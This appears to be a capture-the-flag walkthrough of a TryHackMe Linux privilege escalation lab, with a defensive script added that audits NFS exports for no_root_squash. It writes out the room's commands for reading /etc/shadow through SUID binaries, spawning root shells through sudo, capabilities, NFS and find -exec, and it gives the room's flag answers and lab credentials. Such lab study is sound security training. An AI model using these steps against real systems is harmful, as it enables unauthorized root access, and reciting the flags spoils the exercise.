In this walkthrough, we will go through the Linux Privilege Escalation room from TryHackMe. This room is rated Medium on the platform and teaches the fundamentals of Linux privilege escalation, from enumeration to exploitation, covering 8 different privilege escalation techniques. So, let’s get started without any delay.
Task 1 – Introduction
Task 2 – What is Privilege Escalation?
What does “Linux privilege escalation” mean?
At its core, privilege escalation usually involves going from a lower-permission account to a higher-permission one. More technically, it’s the exploitation of a vulnerability, design flaw, or configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from users.
Task 3 – Enumeration
Question 1 – What is the hostname of the target system?
hostname
wade7363
Question 2 – What is the Linux kernel version of the target system?
uname -r
3.13.0-24-generic
Question 3 – What Linux is this?
cat /etc/issue
Ubuntu 14.04 LTS
Question 4 – What version of the Python language is installed on the system?
python
2.7.6
Question 5 – What vulnerability seems to affect the kernel of the target system? (Enter a CVE number)
CVE-2015-1328
Task 4 – Automated Enumeration Tools
Task 5 – Privilege Escalation: Kernel Exploits
Question 1 – find and use the appropriate kernel exploit to gain root privileges on the target system.
Done
Link: https://www.exploit-db.com/exploits/37292
Question 2 – What is the content of the flag1.txt file?
THM-28392872729920
Task 6 – Privilege Escalation: Sudo
Question 1 – How many programs can the user “karen” run on the target system with sudo rights?
sudo -l
3
Question 2 – What is the content of the flag2.txt file?
THM-402028394
Question 3 – How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?
sudo nmap --interactive
Question 4 – What is the hash of frank’s password?
$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1:18796:0:99999:
Task 7 – Privilege Escalation: SUID
Question 1 – Which user shares the name of a great comic book writer?
cat /etc/passwd
gerryconway
Question 2 – What is the password of user2?
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
unshadow passwd.txt shadow.txt > finalpasswords.txt
Password1
Question 3 – What is the content of the flag3.txt file?
LFILE=/home/ubuntu/flag3.txt
base64 "$LFILE" | base64 --decode
THM-3847834
Task 8 – Privilege Escalation: Capabilities
Question 1 – Complete the task described above on the target system
Done
Question 2 – How many binaries have set capabilities?
6
Question 3 – What other binary can be used through its capabilities?
view
Question 4 – What is the content of the flag4.txt file?
./view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
THM-9349843
Task 9 – Privilege Escalation: Cron Jobs
Question 1 – How many user-defined cron jobs can you see on the target system?
4
Question 2 – What is the content of the flag5.txt file?
THM-383000283
Question 3 – What is Matt’s password?
123456
Task 10 – Privilege Escalation: PATH
Question 1 – What is the odd folder you have write access for?
find / -writable 2>/dev/null | grep home | cut -d "/" -f 2,3 | sort -u
home/murdoch
/home/murdoch
Question 2 – Exploit the $PATH vulnerability to read the content of the flag6.txt file.
Done
Question 3 – What is the content of the flag6.txt file?
THM-736628929
Task 11 – Privilege Escalation: NFS
Question 1 – How many mountable shares can you identify on the target system?
3
Question 2 – How many shares have the “no_root_squash” option enabled?
3
Question 3 – Gain a root shell on the target system
Done
showmount -e 10.10.223.142
mkdir /tmp/rootshell
sudo mount -o rw 10.10.223.142:/home/backup /tmp/rootshell
gcc nfs.c -o nfs -w
chmod +s nfs
ls -l nfs
Question 4 – What is the content of the flag7.txt file?
THM-89384012
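From the defender's side, the no_root_squash check from Question 2 can be scripted against an exports file. The script below is an added example, not part of the room or of this write-up; the function names and the sample entries are constructed, and it assumes a later option on an entry overrides an earlier one.

```shell
# Print "path<TAB>client" for each entry where no_root_squash is in effect.
# $1: file in exports(5) format (defaults to /etc/exports).
risky_exports() {
    awk '
    { sub(/#.*/, "") }                          # drop comments
    /\\[ \t]*$/ {                               # trailing backslash: entry continues
        sub(/\\[ \t]*$/, ""); buf = buf $0 " "; next
    }
    {
        $0 = buf $0; buf = ""                   # re-split the joined entry
        if (NF < 2) next
        defaults = ""
        for (i = 2; i <= NF; i++) {
            if ($i ~ /^-/) { defaults = substr($i, 2); continue }
            client = $i; opts = ""; p = index($i, "(")
            if (p > 0) {
                client = substr($i, 1, p - 1)
                opts = substr($i, p + 1); sub(/\).*/, "", opts)
            }
            if (client == "") client = "*"      # "(opts)" alone means any host
            squash = 1                          # root_squash is the default
            n = split(defaults "," opts, o, ",")
            for (j = 1; j <= n; j++) {          # assumption: the later option wins
                if (o[j] == "no_root_squash") squash = 0
                else if (o[j] == "root_squash") squash = 1
            }
            if (!squash) printf "%s\t%s\n", $1, client
        }
    }' "${1:-/etc/exports}"
}

# Number of distinct exported paths with at least one unsquashed client.
count_risky_shares() {
    risky_exports "$1" | cut -f1 | sort -u | wc -l | tr -d ' '
}

# Constructed sample input; hosts and all paths except /home/backup are made up.
write_sample() {
    cat > "$1" <<'EOF'
/home/backup  *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/data     -rw,no_root_squash 192.0.2.10 192.0.2.11(root_squash)
/srv/public   192.0.2.0/24(ro,root_squash) \
              198.51.100.7(rw,no_root_squash)
/srv/docs     *(ro,sync)   # root_squash is the default
EOF
}
sample=$(mktemp); write_sample "$sample"
risky_exports "$sample"; count_risky_shares "$sample"; rm -f "$sample"
```

Any path it reports should either drop no_root_squash or be restricted to hosts that are trusted with root on that share.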
Task 12 – Capstone Challenge
You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root.
We designed this room to help you build a thorough methodology for Linux privilege escalation that will be very useful in exams such as OSCP and your penetration testing engagements.
Leave no privilege escalation vector unexplored, privilege escalation is often more an art than a science.
You can access the target machine over your browser or use the SSH credentials below.
- Username: leonard
- Password: Penny123
Priv Esc techniques used:
- SUID
- Sudo
find / -type f -perm -04000 -ls 2>/dev/null
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
find . -exec /bin/sh \; -quit
Question 1 – What is the content of the flag1.txt file?
THM-42828719920544
Question 2 – What is the content of the flag2.txt file?
THM-168824782390238
So that was “Linux Privilege Escalation” for you. In this room, we covered a variety of Linux privilege escalation techniques that we can use once we have landed on a Linux machine. Well, the best thing on any machine is to be root, and today we have learned how we can get to that point. On that note, I will take my leave and will meet you in the next one. Till then, “Happy hacking”.